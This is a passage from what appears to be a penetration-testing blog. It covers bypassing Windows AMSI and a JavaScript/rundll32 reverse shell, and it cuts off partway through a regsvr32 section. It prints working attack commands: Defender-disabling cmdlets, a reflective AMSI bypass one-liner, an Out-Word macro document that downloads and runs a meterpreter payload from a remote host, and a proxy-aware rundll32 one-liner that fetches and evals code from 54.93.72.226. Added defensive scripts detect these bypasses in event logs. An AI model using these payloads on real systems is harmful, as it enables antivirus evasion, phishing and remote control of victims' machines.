<b>Executing scripts without using powershell.exe -</b> Using a separate runspace (<a href="https://github.com/Cn33liz/p0wnedShell">p0wnedshell</a>, <a href="https://github.com/jaredhaight/PSAttack">psattack</a>) and using System.Management.Automation.dll (<a href="https://github.com/Ben0xA/nps">nps</a>, <a href="https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick">PowerPick</a>) <br />
<br />
<b>Unusual Storage</b> - Scripts loaded from WMI namespaces, Registry Keys and Event Logs. <br />
<br />
<b>Application whitelisting bypass methods</b> - InstallUtil, regsvr32 and rundll32<br />
<br />
All of the techniques were detected by AMSI! While the detection was no surprise given that AMSI steps in at the script host level, this still looked intimidating, more so because Windows Defender supports AMSI by default on Windows 10. I quickly started looking for different ways to avoid or bypass AMSI. It turned out that there are a bunch of techniques that can be used to bypass or avoid AMSI.<br />
<br />
<h4 style="text-align: left;">
Bypass or Avoid AMSI </h4>
<br />
<b>Force use of PowerShell v2</b>: PowerShell v2 doesn't support AMSI at the time of writing. If .Net 3.0 is available on a target Windows 10 machine, which is not the default, PowerShell v2 can be started with the -Version option.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM5e8_7N_h23jULICrPZ5UwLIurYTUTp_G8Ng2dx_oe2lzlsUP6LrQIWRhnM8ihZvWtHgKKTxxJ91cVMzM5b-od_LqNKlJk6h6l3iSvRlFKFL6n96st6a-u6BiNjHq_wG6OHtYZPxV0fw/s1600/PSv2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM5e8_7N_h23jULICrPZ5UwLIurYTUTp_G8Ng2dx_oe2lzlsUP6LrQIWRhnM8ihZvWtHgKKTxxJ91cVMzM5b-od_LqNKlJk6h6l3iSvRlFKFL6n96st6a-u6BiNjHq_wG6OHtYZPxV0fw/s400/PSv2.jpg" width="400" /></a></div>
<br />
<div style="text-align: left;">
<b>Obfuscation </b></div>
Another interesting way is to change the signature of the PowerShell script so that the AntiVirus to which AMSI submits our script doesn't detect it as malicious. To play with the signatures Windows Defender has for scripts, let's play with one of the scripts from Nishang, Gupt-Backdoor, which gets detected as malicious by AMSI.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOkyvKW6n-sDKPS26rPkaHfh623frh4v-zyGyRsFkw1LJK7iIS-m1BdRBMUGQBjCgF5FansJ2uOCg_mBbqtvYRoXVuL3c9zLHAOf3WtVZsKH7PUwcJAk_xgY2Votab8BycAizZ5YeEivQ/s1600/Gupt_Backdoor.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOkyvKW6n-sDKPS26rPkaHfh623frh4v-zyGyRsFkw1LJK7iIS-m1BdRBMUGQBjCgF5FansJ2uOCg_mBbqtvYRoXVuL3c9zLHAOf3WtVZsKH7PUwcJAk_xgY2Votab8BycAizZ5YeEivQ/s400/Gupt_Backdoor.jpg" width="400" /></a></div>
<br />
Let's remove the help section and all the functionality, and replace the function and variable names with random strings.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6F1TrFGXhZG5_jDklQ_OP4-KxDmP_EWITixZQ-2J5mGTrt1iRIYXl3SO5dLOaB6bi1ZIz_0w03Mi2QHkqFbEXtXbrnnWnnjrLfRsWfyicQKmsRkm9Bdex18cCknDCAYB_IEBMF1lThyphenhyphen8/s1600/Gupt_modified.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6F1TrFGXhZG5_jDklQ_OP4-KxDmP_EWITixZQ-2J5mGTrt1iRIYXl3SO5dLOaB6bi1ZIz_0w03Mi2QHkqFbEXtXbrnnWnnjrLfRsWfyicQKmsRkm9Bdex18cCknDCAYB_IEBMF1lThyphenhyphen8/s320/Gupt_modified.jpg" width="320" /></a></div>
<br />
And the result is:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6wqZBHMlmEGNpySGIo8kjK5gCvADjjXhavt1X-PqTLy_c0Tpm6Ub5DuRDqtv9Y9xiZd8ovSAhoL-LUzeMIykhG127LrFb4DlIIWDwtb5bSwDABk3QTV133E28VRCpzX1LbKCPH9ARXdE/s1600/Gupt_modified_undetected.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6wqZBHMlmEGNpySGIo8kjK5gCvADjjXhavt1X-PqTLy_c0Tpm6Ub5DuRDqtv9Y9xiZd8ovSAhoL-LUzeMIykhG127LrFb4DlIIWDwtb5bSwDABk3QTV133E28VRCpzX1LbKCPH9ARXdE/s400/Gupt_modified_undetected.jpg" width="400" /></a></div>
<br />
Apparently, among other things, Windows Defender looks for specific function and variable names. Actually, this should not be a surprise, as I know of a few antiviruses which use Twitter handles of PowerShell hackers as a signature. <br />
<br />
Manual obfuscation of a huge script such as Invoke-Mimikatz is not practical. Fortunately, the obfuscate functionality of the awesome <a href="http://www.powertheshell.com/isesteroids2-2/">ISE-Steroids module</a> is very effective! Let's obfuscate Invoke-Mimikatz from Nishang. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfh1s8CaR5Bye0UngynCTTvOn_CQ1vJ1zZCM8-wOMK1IXCleSnEyd628G_Un3RS0Z0dSA0CpegNsme8-COrkccH1vEYNzP_Aq2_CL3yRVu2RzDz2sUjjpE3c0os_woFXCCbOusg-ewwJM/s1600/obfuscate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="157" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfh1s8CaR5Bye0UngynCTTvOn_CQ1vJ1zZCM8-wOMK1IXCleSnEyd628G_Un3RS0Z0dSA0CpegNsme8-COrkccH1vEYNzP_Aq2_CL3yRVu2RzDz2sUjjpE3c0os_woFXCCbOusg-ewwJM/s400/obfuscate.jpg" width="400" /></a></div>
Now, when the obfuscated version is loaded, there is no detection.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIyycCKKkz6dWyN22nTdiu8x4Q0lgbz-GUzZjM2O2d7D7YuVnyFhGC2PIsbhX_Fxk5GnrybT_XQ4xWO5GScLf0jC9MnNK9wXqUfOvqyw4LTsEQfv9VI6zeFZaYA9Mb10tErGW8_weC2-A/s1600/inoke-mimikatz-obfuscated.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIyycCKKkz6dWyN22nTdiu8x4Q0lgbz-GUzZjM2O2d7D7YuVnyFhGC2PIsbhX_Fxk5GnrybT_XQ4xWO5GScLf0jC9MnNK9wXqUfOvqyw4LTsEQfv9VI6zeFZaYA9Mb10tErGW8_weC2-A/s400/inoke-mimikatz-obfuscated.jpg" width="400" /></a></div>
Bingo!<br />
<br />
Make sure that the function calls are made from the script before obfuscation. <br />
This is very interesting! As per the articles mentioned at the beginning of this post, AMSI has additional calls if any sort of obfuscation, even base64, is used in the script. This obfuscation getting past AMSI has been a bit of a mystery to me. It probably has more to do with the signatures available to Windows Defender than with AMSI itself. I welcome comments on this specific point, as I am unable to understand why Invoke-Mimikatz was not detected if the plain de-obfuscated code was submitted to AMSI. <br />
<br />
<div style="text-align: left;">
<b>Unload AMSI</b></div>
<div style="text-align: left;">
<br /></div>
<b>Set-MpPreference</b><br />
This built-in cmdlet can be used to make AMSI ineffective by disabling the protection offered by Windows Defender. <br />
<br />
The command below can be used to disable real-time monitoring for Windows Defender:<br />
<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true
</textarea></pre>
There are some 'gotchas' with the technique though:<br />
<ul style="text-align: left;">
<li>A notification is shown to the user </li>
<li>Needs to be run from an elevated shell</li>
<li>Event ID 5001 (Microsoft-Windows-Windows Defender/Operational) - Windows Defender Real-Time Protection was disabled.</li>
</ul>
Another command can be used; this one is useful for avoiding detection of the in-memory download-execute one-liner. <br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Set-MpPreference -DisableIOAVProtection $true
</textarea></pre>
This command doesn't show any notification to the user but:<br />
<ul style="text-align: left;">
<li>An elevated shell is still required and;</li>
<li>Event ID 5004 (Microsoft-Windows-Windows Defender/Operational) - Windows Defender Real-Time Protection feature (IE Downloads and Outlook Express attachments) configuration has changed. </li>
</ul>
<b>DLL Hijacking - Method used in p0wnedshell</b><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Cornelis de Plaa (@Cneelis) discovered this brilliant method and implemented it in his awesome <a href="https://github.com/Cn33liz/p0wnedShell">p0wnedshell</a>. There is a <a href="http://cn33liz.blogspot.com/2016/05/bypassing-amsi-using-powershell-5-dll.html">detailed blog post about the method</a>. It is a DLL hijacking method where amsi.dll is dropped in the current working directory while loading the p0wnedshell runspace. The DLL is loaded by the runspace and exits immediately to unload AMSI.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv0xAhp8qCVOd5ZT5ondP2i7P8HyTWpumN56YWxES1yHjNDUWDocQ7KUiCyQy_X2EBsOnIz1DUmTuIXnAnipiNJcwpCof5YD0qxB4aJoN23GK9Du_5HS0b7-mxTnbc4SauUwyf3IXGZX0/s1600/p0wnedshell.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjv0xAhp8qCVOd5ZT5ondP2i7P8HyTWpumN56YWxES1yHjNDUWDocQ7KUiCyQy_X2EBsOnIz1DUmTuIXnAnipiNJcwpCof5YD0qxB4aJoN23GK9Du_5HS0b7-mxTnbc4SauUwyf3IXGZX0/s400/p0wnedshell.jpg" width="400" /></a></div>
So p0wnedshell successfully bypasses AMSI. But there is another interesting part of the security mechanism: PowerShell v5 supports automatic script block logging. The scripts loaded by p0wnedshell generate Event ID 4104 (Microsoft-Windows-PowerShell/Operational) - Suspicious script block logging (due to the successful loading of scripts in memory). <br />
<br />
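Two defender-side checks for the bypasses above, as an added example that is not code from the post, p0wnedshell or Nishang. Get-AmsiModuleStatus lists which amsi.dll each PowerShell host process has loaded: a copy outside System32 is the DLL hijack just described, and no amsi.dll at all is what a v2 engine looks like. Get-DefenseTamperingEvents pulls the events listed in this section (Defender 5001 and 5004, the PowerShell 4104 blocks the engine logs at Warning level even without full script block logging) plus the engine start-up event 400, which carries the EngineVersion and so exposes a v2 downgrade. Both assume an elevated shell, since other users' processes and the Defender log are not readable otherwise.

```powershell
# Added example; not code from the post, p0wnedshell or Nishang.
# Assumes an elevated shell so that other users' processes and the Defender log are readable.

function Get-AmsiModuleStatus {
    # Which amsi.dll, if any, each PowerShell host has loaded. A copy outside System32 is the
    # p0wnedshell-style hijack; none at all is what a v2 engine or an unloaded AMSI looks like.
    $expected = Join-Path $env:SystemRoot 'System32\amsi.dll'
    foreach ($proc in Get-Process -Name powershell, powershell_ise -ErrorAction SilentlyContinue) {
        $amsi = $null; $note = $null
        try {
            $amsi = $proc.Modules | Where-Object { $_.ModuleName -ieq 'amsi.dll' } | Select-Object -First 1
        }
        catch { $note = $_.Exception.Message }   # access denied or 32/64-bit host mismatch
        if ($note)                              { $verdict = "modules unreadable: $note" }
        elseif (-not $amsi)                     { $verdict = 'amsi.dll not loaded' }
        elseif ($amsi.FileName -ine $expected)  { $verdict = 'amsi.dll loaded from unexpected path' }
        else                                    { $verdict = 'ok' }
        $amsiPath = if ($amsi) { $amsi.FileName } else { $null }
        [pscustomobject]@{ ProcessId = $proc.Id; AmsiPath = $amsiPath; Verdict = $verdict }
    }
}

function Get-DefenseTamperingEvents {
    param([int] $Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    $queries = @(
        # 5001: real-time protection disabled; 5004: IOAV (download scanning) configuration changed.
        @{ LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5001, 5004; StartTime = $since },
        # 4104 at Warning (level 3): blocks the engine itself rates suspicious, logged even when
        # full script block logging is not enabled.
        @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; Level = 3; StartTime = $since },
        # 400: engine start-up; the message includes EngineVersion, so a v2 engine shows up here.
        @{ LogName = 'Windows PowerShell'; Id = 400; StartTime = $since }
    )
    foreach ($query in $queries) {
        Get-WinEvent -FilterHashtable $query -ErrorAction SilentlyContinue | ForEach-Object {
            if ($_.Id -eq 400 -and $_.Message -notmatch 'EngineVersion=2\.') { return }
            $text = $_.Message -replace '\s+', ' '
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Log     = $_.LogName
                Id      = $_.Id
                Summary = $text.Substring(0, [Math]::Min(160, $text.Length))
            }
        }
    }
}

Get-AmsiModuleStatus | Format-Table -AutoSize
Get-DefenseTamperingEvents -Hours 24 | Format-Table -AutoSize -Wrap
```

The module check is a point-in-time view and only covers powershell.exe and the ISE; a custom host built on System.Management.Automation.dll, as used by the tools listed earlier, needs the same check run against its own process name.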
<b>Reflection - Matt Graeber's method</b><br />
Matt Graeber (@mattifestation) <a href="https://twitter.com/mattifestation/status/735261176745988096">tweeted</a> an awesome one-line AMSI bypass. Like many other things by Matt, this is my favorite. It <u>doesn't need an elevated shell</u> and there is no notification to the user, but automatic script block logging, as in the case of p0wnedshell, still generates Event ID 4104. Turns out that it is the script block logging which is the real headache. There are a bunch of script block logging bypasses I am aware of, discovered by other PowerShell hackers, but they are not public yet.<br />
<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
</textarea></pre>
<br />
Anyway, I like this method because it can be combined with existing PowerShell script execution methods.<br />
For example, let's bypass AMSI in a client-side attack and get a meterpreter on the target Windows 10 box. Let's generate a weaponized MS Word document using Nishang's Out-Word and instruct it to run the bypass and then download and execute a PowerShell meterpreter: <br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\test> Out-Word -Payload 'powershell.exe -ExecutionPolicy Bypass -noprofile [Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true);iex(New-Object Net.WebClient).DownloadString(''http://192.168.230.1/msfpayload.ps1'')' -RemainSafe
</textarea></pre>
As soon as a target opens the Word file and clicks on "Enable Content", this happens:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0KTAIpUG4qFk9SJyi0nRAKUT4dgKmT9ULBc7j0i0rM0vl53MlMyFcpInG0h2Z2282rcY8fRhyphenhyphen-e2FnNFT7KPlj85BBc0zMQUYpoocktXuJgEDNfbX1F3RveKRlerwRiBaGDPfy7OzNaA/s1600/meterpreter.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0KTAIpUG4qFk9SJyi0nRAKUT4dgKmT9ULBc7j0i0rM0vl53MlMyFcpInG0h2Z2282rcY8fRhyphenhyphen-e2FnNFT7KPlj85BBc0zMQUYpoocktXuJgEDNfbX1F3RveKRlerwRiBaGDPfy7OzNaA/s400/meterpreter.jpg" width="400" /></a></div>
Sweet! We bypassed AMSI in a client side attack!<br />
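Since script block logging is what actually records this stager, here is a small triage routine for 4104 ScriptBlockText values. This is an added example written for this post, not code from Nishang or from the talk, and the event records it runs over are constructed samples, not real logs. It folds the cheap tricks a reviewer sees every day (backticks, 'Amsi'+'Utils' string splitting) before matching the reflective AMSI bypass and the download cradle. It catches the one-liner exactly as used above and its trivial variants; a bypass that silences logging itself, like the unpublished ones mentioned earlier, leaves nothing here to match.

```python
import re

# Constructed Microsoft-Windows-PowerShell/Operational 4104 records (sample data,
# not real logs). Record 1 is what the Out-Word stager above leaves behind.
SAMPLE_4104 = [
    {"id": 1, "ScriptBlockText":
        "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
        ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);"
        "iex(New-Object Net.WebClient).DownloadString('http://192.168.230.1/msfpayload.ps1')"},
    {"id": 2, "ScriptBlockText":
        "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},
    {"id": 3, "ScriptBlockText":  # same bypass, split strings and a backtick as cheap evasion
        "[Ref].Assembly.GetType('System.Management.Automation.Amsi'+'Utils')"
        ".GetField('amsiIn`itFailed','NonPublic,Static').SetValue($null,$true)"},
    {"id": 4, "ScriptBlockText":
        "IEX (New-Object System.Net.WebClient).DownloadString('https://intranet.example/Get-Inventory.ps1')"},
]


def normalize(block):
    """Fold the cheap obfuscations before matching: the backtick is PowerShell's
    escape character ('Am`si' is the same string as 'Amsi'), and 'Amsi'+'Utils'
    concatenates to one literal. Whitespace is collapsed and case dropped."""
    s = block.replace("`", "")
    s = re.sub(r"'\s*\+\s*'", "", s)
    s = re.sub(r'"\s*\+\s*"', "", s)
    return " ".join(s.split()).lower()


RULES = [
    # the reflective bypass touches the private AmsiUtils type / amsiInitFailed field
    ("amsi-reflection-bypass", re.compile(r"amsiutils|amsiinitfailed")),
    # IEX (New-Object [System.]Net.WebClient).DownloadString(...)
    ("download-cradle", re.compile(
        r"(iex|invoke-expression)\s*\(?\s*\(?\s*new-object\s+(system\.)?net\.webclient\s*\)\s*\.downloadstring")),
]


def triage(events):
    """Return {record id: [rule names]} for records matching at least one rule."""
    hits = {}
    for ev in events:
        text = normalize(ev["ScriptBlockText"])
        tags = [name for name, rx in RULES if rx.search(text)]
        if tags:
            hits[ev["id"]] = tags
    return hits


if __name__ == "__main__":
    for rid, tags in triage(SAMPLE_4104).items():
        print("4104 record %d: %s" % (rid, ", ".join(tags)))
```

Records 1, 3 and 4 are flagged; the benign Get-Process pipeline in record 2 is not. Run it against real exports by replacing SAMPLE_4104 with the ScriptBlockText field of your 4104 events.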
<br />
AMSI is certainly not the security silver bullet which many organizations (wrongly) keep looking for but it is indeed an improvement in Windows security. <br />
<br />
My slides for the Black Hat presentation are here:<br />
<a href="http://www.slideshare.net/nikhil_mittal/amsi-how-windows-10-plans-to-stop-scriptbased-attacks-and-how-well-it-does-it">http://www.slideshare.net/nikhil_mittal/amsi-how-windows-10-plans-to-stop-scriptbased-attacks-and-how-well-it-does-it</a><br />
<iframe allowfullscreen="" frameborder="0" height="385" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/key/8fdAuBGhvNXZ1o" style="border-width: 1px; border: 1px solid #ccc; margin-bottom: 5px; max-width: 100%;" width="595"> </iframe> <br />
<div style="margin-bottom: 5px;">
<b> <a href="https://www.slideshare.net/nikhil_mittal/amsi-how-windows-10-plans-to-stop-scriptbased-attacks-and-how-well-it-does-it" target="_blank" title="AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It">AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It</a> </b> from <b><a href="https://www.slideshare.net/nikhil_mittal" target="_blank">Nikhil Mittal</a></b> </div>
<br />
Hope this was useful. Please leave feedback and comments!<br />
<br /></div>
Nikhil "SamratAshok" Mittal (<a href="http://www.blogger.com/profile/02092541175521734123">Blogger profile</a>)<br />
<br />
<b>Practical use of JavaScript and COM Scriptlets for Penetration Testing</b> (published 2016-05-25, updated 2018-01-14)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
I have been following Casey Smith's brilliant work on JavaScript and <a href="http://subt0x10.blogspot.in/2016/04/setting-up-homestead-in-enterprise-with.html">COM Scriptlets</a>. After looking at <a href="https://github.com/subTee/SCTPersistence">his work</a>, I started playing with the code. I was interested in developing easy and customizable ways to use JavaScript, SCT files, rundll32 and regsvr32 for...well...interesting things. After using some weeknights and weekends, I give you the following PowerShell scripts (all available in <a href="https://github.com/samratashok/nishang">Nishang</a>):</div>
<div style="text-align: justify;">
</div>
<h3 style="text-align: justify;">
Invoke-JSRatRundll </h3>
<div style="text-align: justify;">
Based on <a href="https://github.com/subTee/PoshRat">JSRAT</a> by Casey, Invoke-JSRatRundll uses rundll32.exe to execute JavaScript on a target, which provides a reverse PowerShell shell over HTTP. Why? Because it is so cool. Also, it is file-less, the client part is just a single command and, most importantly, it is another method to pwn targets :) The script and the client part are intelligent enough to figure out if there is a proxy in use, and to use the first proxy when Internet Explorer settings list multiple proxies. Also, based on the method <a href="http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html">mentioned here</a>, Invoke-JSRatRundll doesn't leave rundll32.exe running on the target when the "exit" command is issued from the spawned reverse shell, so the exit is clean. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The listener, on the attacker's machine, needs to be run from an elevated PowerShell session (a System.Net.HttpListener can only bind a URL prefix that has no URL reservation when running as administrator).</div>
<div style="text-align: justify;">
This is how it looks in action:<br />
<br />
Start the listener</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAVwVX0rUBe7iuOFPgfa3iRHFNwmfkjXcveXN0NOHvuoCWzsb4ANDz8O9vbfiu9qY06IGS0brZwvqRq_No7xSZ09JVx3h5G81o-h87p77-kBSg5gxAFxznMgBRTSE_J72X8VqKxsnFmSU/s1600/rundll_listener.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAVwVX0rUBe7iuOFPgfa3iRHFNwmfkjXcveXN0NOHvuoCWzsb4ANDz8O9vbfiu9qY06IGS0brZwvqRq_No7xSZ09JVx3h5G81o-h87p77-kBSg5gxAFxznMgBRTSE_J72X8VqKxsnFmSU/s400/rundll_listener.png" width="400" /></a></div>
The above listener provides the following command to be run on a target. Please note that you will need to remove any newlines when copying it; it is a single command line:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: white; color: black;">rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");try{q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){h.SetProxy(2,v);}}finally{h.Open("GET","http://54.93.72.226:8080/connect",false);h.Send();B=h.ResponseText;eval(B)}
</textarea></pre>
</div>
<div style="text-align: justify;">
When the command is executed on the target:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN2njPpxpNy3rUCxuj6h0hBeq0m7kMVkUuCbCMpTMaBFkI-ZQ-elwKrPVVoRTuKrQvH7vzFX06w8QThRKDfTgC4rVVr1UoLGjOBPCB_YLMk4YObplqBmkvrCIEB21Y67NcLxCj9c2idic/s1600/rundll_target.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="45" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN2njPpxpNy3rUCxuj6h0hBeq0m7kMVkUuCbCMpTMaBFkI-ZQ-elwKrPVVoRTuKrQvH7vzFX06w8QThRKDfTgC4rVVr1UoLGjOBPCB_YLMk4YObplqBmkvrCIEB21Y67NcLxCj9c2idic/s400/rundll_target.png" width="400" /></a></div>
We get a connect back on the listener:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipN8seXJ1HNIyPaGi1r6cXubReXPXQqbsi-EPgOJsNSLZSX1lDdunxx_lpYgCpZfyzBe62zUFo6kpb8HRFVa9nxBUp6wZMcD2SxenlecNbIZSiUePtNlTJ4T8i-rmkN2wXYEVbt88oe_c/s1600/rundll_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipN8seXJ1HNIyPaGi1r6cXubReXPXQqbsi-EPgOJsNSLZSX1lDdunxx_lpYgCpZfyzBe62zUFo6kpb8HRFVa9nxBUp6wZMcD2SxenlecNbIZSiUePtNlTJ4T8i-rmkN2wXYEVbt88oe_c/s400/rundll_shell.png" width="400" /></a></div>
Nice! A proxy-aware, file-less, reverse PowerShell session.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The client part (the one-line command) can be used whenever we have the ability to execute a command on the target. Below is an example of using the client part with Out-Word from Nishang. Note that the double quotes in the client part need to be escaped by doubling them.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoLSTzGFAgh0tqDBoBgaLYC-sd1AnCZ67zZeOul8SOaldTK5w2HRVQ_UR-TNubPL55h5ptClwjChpOo64KeWxpRF0YI-3HMfpBIGd7vVK-Ha-0wE5oXaRw7T41OSA2G02-KGqXTM52YWU/s1600/rundll_client.png" imageanchor="1"><img border="0" height="38" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoLSTzGFAgh0tqDBoBgaLYC-sd1AnCZ67zZeOul8SOaldTK5w2HRVQ_UR-TNubPL55h5ptClwjChpOo64KeWxpRF0YI-3HMfpBIGd7vVK-Ha-0wE5oXaRw7T41OSA2G02-KGqXTM52YWU/s400/rundll_client.png" width="400" /></a></div>
When a target user opens the Word file and chooses to enable macros, the listener will receive a connect back from the target machine. Bingo!<br />
<br /></div>
<div style="text-align: justify;">
One thing to note in Invoke-JSRatRundll is that a window pops up temporarily whenever a command is executed on the target. This is because of the use of the Exec method of WScript.Shell. The Run method, which provides silent execution, could not be used because it does not return the command's output without first storing that output somewhere on the target.</div>
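The proxy handling packed into the client one-liner deserves spelling out, because what it does depends on the shape of the ProxyServer registry value. The Python below is an added example, not Nishang code: client_proxy() reproduces the one-liner's decision tree with the same inputs (the ProxyServer string, or None when RegRead throws because the value is absent), and robust_proxy() is an added variant that also honours ProxyEnable and selects the http= entry by name rather than by position. The registry values are constructed test data and the 192.0.2.x addresses are documentation addresses.

```python
# Constructed HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings
# values for the demo (sample data; 192.0.2.x are documentation addresses).
SAMPLES = {
    "single":       "192.0.2.10:8080",
    "per-protocol": "http=192.0.2.10:8080;https=192.0.2.10:8443;ftp=192.0.2.11:2121",
    "https-first":  "https=192.0.2.10:8443;http=192.0.2.10:8080",
}


def client_proxy(proxy_server):
    """What the one-liner does with the ProxyServer string.

    None stands for RegRead() throwing (no ProxyServer value): the JS has no
    catch on the outer try, so finally{} still performs the connect-back,
    just without SetProxy, i.e. a direct connection."""
    if proxy_server is None:
        return None
    try:
        # v.split("=")[1].split(";")[0]: take whatever follows the FIRST '='
        return proxy_server.split("=")[1].split(";")[0]
    except IndexError:
        # no '=' at all (inner catch in the JS): value is already host:port
        return proxy_server


def robust_proxy(reg):
    """Added variant, not what the Nishang client does: honour ProxyEnable
    (WinINET ignores ProxyServer when it is 0) and pick the http= entry by
    name, so the order of the per-protocol list does not matter."""
    if reg.get("ProxyEnable", 0) != 1:
        return None
    value = reg.get("ProxyServer") or ""
    if "=" not in value:
        return value or None
    entries = dict(e.split("=", 1) for e in value.split(";") if "=" in e)
    return entries.get("http") or entries.get("https")


if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print("%-13s one-liner -> %s   robust -> %s" % (
            name, client_proxy(value),
            robust_proxy({"ProxyEnable": 1, "ProxyServer": value})))
```

The "https-first" sample is the case to remember: the one-liner takes the first entry whatever its protocol, so a value that lists the HTTPS proxy first sends the plain-HTTP connect-back through it, and a stale ProxyServer left behind with ProxyEnable set to 0 makes the one-liner try a proxy the browser itself no longer uses.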
<div style="text-align: justify;">
</div>
<h3 style="text-align: justify;">
Invoke-JSRatRegsvr</h3>
<div style="text-align: justify;">
This script uses regsvr32.exe to provide a reverse PowerShell session over HTTP. Using regsvr32 this way, the technique which has been termed <a href="https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302">"Squiblydoo"</a>, has added benefits: regsvr32.exe handles the proxy by itself, the execution is file-less and, AFAIK, it leaves no traces on the target after a clean exit. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The listener needs to be run from an elevated PowerShell session on the attacker's machine. This is how it looks in action: <br />
<div class="separator" style="clear: both; text-align: center;">
